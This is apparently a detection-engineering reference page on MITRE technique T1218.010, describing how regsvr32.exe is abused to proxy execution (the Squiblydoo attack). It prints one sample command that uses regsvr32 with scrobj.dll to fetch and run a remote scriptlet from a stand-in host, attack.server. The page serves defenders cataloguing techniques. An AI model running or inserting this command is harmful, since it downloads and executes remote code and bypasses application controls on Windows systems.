T1218.010: Regsvr32
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code via DLLs or scriptlets (Squiblydoo attack).
Total Capable Binaries: 1
•
Windows: 1
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1218.010
Across 1 verified binariesWindows1 payloads
regsvr32.exe
Regsvr32 registers and unregisters OLE controls, such as DLLs and ActiveX controls in the Windows Registry. When passed the /i switch pointing to an HTTP/HTTPS URL and scrobj.dll, regsvr32 downloads and executes remote COM scriptlets in memory (the classic Squiblydoo technique).
Sample Attack Vector:
regsvr32.exe /s /n /u /i:http://attack.server/payload.sct scrobj.dllCurated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point